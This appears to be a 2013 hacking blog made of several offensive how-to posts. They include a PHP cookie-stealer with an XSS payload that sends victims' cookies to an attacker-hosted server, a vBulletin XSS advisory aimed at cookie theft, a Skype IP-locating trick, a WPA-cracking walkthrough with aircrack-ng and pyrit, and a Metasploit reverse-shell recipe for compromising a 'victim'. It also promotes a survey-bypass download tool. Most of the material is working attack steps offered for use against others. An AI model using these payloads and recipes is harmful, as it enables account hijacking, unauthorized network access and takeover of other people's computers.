domenica 2 giugno 2013

How to grab cookies using XSS

Let's work: First register a free hosting account. You can try on this sites: http://www.funpic.de ; http://www.altervista.org ; http://www.netsons.org . After all: registration and activation, we need to upload this 2 php pages on the site.
vb.php
<head>
<meta http-equiv="Content-Language" content="it">
<title>Cookies Stealther - Designed and programmed by R00t[ATI]</title>
</head>

<body bgcolor="#C0C0C0">

<p align="center"><font color="#FF0000">COOKIES STEALTHER</font></p>
<p align="center"><font face="Arial" color="#FF0000">By R00T[ATI]</font></p>
<p align="left">&nbsp;</p>

</body>

documents.php
<?php

$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET[c];

$time = date("Y-m-d G:i:s A");
$text = "<br><br>".$time." = ".$ip."<br><br>User Agent: ".$agent."<br>Referer: ".$referer."<br>Session: ".$data."<br><br><br>";

$file = fopen('vb.php' , 'a');
fwrite($file,$text);
fclose($file);
header("Location: http://www.google.com");

?>
Vb.php file is used to SHOW at the attacker  what cookies are grabbed and other information.
documents.php file is used to GRAB information at the victim like: ip address, user agent and naturally cookies.
Now, we need to find vulnerable site to Cross Site Scripting (XSS). After this insert a script that call documents.php that grab document cookie by using "c" method: documents.php?c="+document.cookie;
For example: http://vulnerable-site.com/vulnerable_page.php?vulnerable_method=<script>document.location="http://syshack.sy.funpic.de/documents.php?c="+document.cookie;</script>
Victim will be redirected to http://www.google.com (edit it in documents.php). And the attacker can be see victim cookies on vb.php

Sangteamtham/vBulletin 4.2.0 Cross Site Scripting

$------------------------------------------------------------------------------------------------------------
$ vBulletin 4.2.0 XSS Vulnerability
$ Author : hackersmeet
$*************************************************************************************************************
1.vBulletin Description:
 
 Content publishing, search, security, and more— vBulletin has it all.
 Whether it’s available features, support, or ease-of-use, vBulletin offers the most for your money.
 Learn more about what makes vBulletin the choice for people who are serious about creating
 thriving online communities.
 
2. Vulnerability Description:
 
To steal cookie from administrator or any member in a forum or drive them to malicious sites, attacker will firstly create an account, then come to
calendar section, and create an event for himself.
 
In title, he will inject XSS code there. For sample:
 
"><img src=x onerror=alert(1)>
 
In content section, he will write everything he likes. Now, he will send his profile to Administrator or any member
and wait for cookie or victims' infection.
 
 
3. Patch:
 
June 13, 2012: Contacted the vendor.
June 14, 2012: Vendor replied me.
June 18, 2012: the vendor released the patch for this vulnerabitily. Please download it from member Area right now.
 
 
$**************************************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$---------------------------------------------------------------------------------------------------------------

FileIce.net Downloader 100% working Bypass Survey (Mediafire link)






Today I am going to share  latest fileice.net downloader to you, by using this tool you can convert any fileice.net links into premium one.Just enter the url of the file and a new link will appear click on download button. enjoy.



Tags:dowload free FileIce.net Downloader,FileIce.net Cracker,FileIce.net hacker,FileIce.net bypass survey,Download file free form fileice.net,Mediafire link for this tool updated,Download free Fileice.net download full version free download,Bypass survey of FileIce.net free download full version cracked 100% working(Mediafire link) Fileice.net free download files full version free.
FileIce.net Downloader 100% working  Bypass Survey


 (Mediafire link) link broken

How to Resolve a Skype IP Address (Alternative method)

1. Call whoever's IP you want to resolve
2. Go to CMD and type netstat -nb
3. Take note of the list of IPs for Skype
4. Start a file transfer with them
5. Type netstat -nb in CMD again
6. The new IP on the list of IPs for Skype is their IP

sabato 1 giugno 2013

S)SYN flood

SYN flood occurs when a host sends a flood of TCP/SYN packets, often with a forged sender address. Each of these packets is handled like a connection request, causing the server to spawn ahalf-open connection, by sending back a TCP/SYN-ACK packet (Acknowledge), and waiting for a packet in response from the sender address (response to the ACK Packet). However, because the sender address is forged, the response never comes. These half-open connections saturate the number of available connections the server is able to make, keeping it from responding to legitimate requests until after the attack ends.

HACK WIFI PASSWORD WITH BACKTRACK 5

WARNING:Don't Hack any authorized router,otherwise you'll be put into jail.
  
Rules to Follow

    • A Backtrack Live CDthe Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
    • here a link to download it http://www.backtrack-linux.org/downloads/
    • A nearby WEP-enabled Wi-Fi network 
    • Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.                                            

     Steps to Follow:
    Step 1 :
    airmon-ng

    The result will be something like :
    Interface    Chipset      Driver
    wlan0        Intel 5100   iwlagn - [phy0]



    Step 2 :
    airmon-ng start wlan0

    Step 3 (Optional) :

    Change the mac address of the mon0 interface.
    ifconfig mon0 down
    macchanger -m 00:11:22:33:44:55 mon0
    ifconfig mon0 up


    Step 4 :
    airodump-ng mon0

    Then, press "
    Ctrl+c" to break the program.

    Step 5 :
    airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

    *where -c is the channel
               -w is the file to be written
               --bssid is the BSSID

    This terminal is keeping running.

    Step 6 :

    open another terminal.
    aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

    *where -a is the BSSID
               -c is the client MAC address (STATION)

    Wait for the handshake.

    Step 7 :

    Use the John the Ripper as word list to crack the WPA/WP2 password.
    aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

    Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,

    If you do not want to use John the Ripper as word list, you can use Crunch.

    Go to the official site of crunch.
    http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

    Download crunch 3.0 (the current version at the time of this writing).
    http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
    tar -xvzf crunch-3.0.tgz
    cd crunch-3.0
    make
    make install

    /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

    *where 
    8 16 is the length of the password, i.e. from 8 characters to 16 characters.

    (B) nVidia Display Card with CUDA

    If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

    Step a :
    airmon-ng

    The result will be something like :
    Interface    Chipset      Driver
    wlan0        Intel 5100   iwlagn - [phy0]



    Step b :
    airmon-ng start wlan0

    Step c (Optional) :

    Change the mac address of the mon0 interface.
    ifconfig mon0 down
    macchanger -m 00:11:22:33:44:55 mon0
    ifconfig mon0 up


    Step d :
    airodump-ng mon0

    Then, press "
    Ctrl+c" to break the program.

    Step e :
    airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

    Step f :

    open another terminal.
    aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

    *where -a is the BSSID
               -c is the client MAC address (STATION)

    Wait for the handshake.

    Step g :

    If the following programs are not yet installed, please do it.
    apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

    Step h :

    Go to the official site of crunch.
    http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

    Download 
    crunch 3.0 (the current version at the time of this writing).http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
    tar -xvzf crunch-3.0.tgz
    cd crunch-3.0
    make
    make install


    Step i :

    Go to the official site of pyrit.
    http://code.google.com/p/pyrit/downloads/list

    Download 
    pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).
    tar -xzvf pyrit-0.4.0.tar.gz
    cd pyrit-0.4.0
    python setup.py build
    sudo python setup.py install

    tar -xzvf cpyrit-cuda-0.4.0.tar.gz
    cd cpyrit-cuda-0.4.0
    python setup.py build
    sudo python setup.py install


    Step j :
    /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

    *where 
    8 16 is the length of the password, i.e. from 8 characters to 16 characters.

    Step k (Optional) :

    If you encounter error when reading the 
    wpacrack-01.cap, you should do the following step.
    pyrit -r wpacrack-01.cap -o new.cap stripLive
    /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

    *where 
    8 16 is the length of the password, i.e. from 8 characters to 16 characters.

    Step l :

    Then, you will see something similar to the following.
    Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3+

    Parsing file 'new.cap' (1/1)...
    Parsed 71 packets (71 802.11-packets), got 55 AP(s)

    Tried 17960898 PMKs so far; 17504 PMKs per second.


    Remarks :

    If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

    To test if your wireless card (either USB or PCI-e) can do the injection or not :
    airodump-ng mon0
    Open another terminal.
    aireplay-ng -9 mon0
    Make sure pyrit workable on your system :
    pyrit list_cores

    Hacking windows 7 using metasploit

    Things you will need ---->

    1. Backtrack OS or Metsaploit.
    2. A victim
    3. Brain(important thing lol)

    Lets start the shit ---->

    1. Open terminal, type msfconsole and hit enter. Metsaploit will open like in image.

    2. Now type use exploit/multi/browser/java_signed_applet and hit enter.

    3. Type set payload windows/meterpreter/reverse_tcp and hit enter.

    4. Type set lhost 223.185.18.74 (must change 223.185.18.74 with your ip address)

    5. Now type set lport 443 and hit enter.

    6. Now type set srvport 80 and hit enter.

    7. Now type set uripath cybersucks and hit enter.(you may change cybersucks to your disired one)

    8. At last type exploit and hit enter. See image below

    9. Now send http://youripaddress:80/cybersucks to your victim.

    10. Now when victim will open it he/she will be hacked.

    11. Now see hacked sessions by typing sessions -l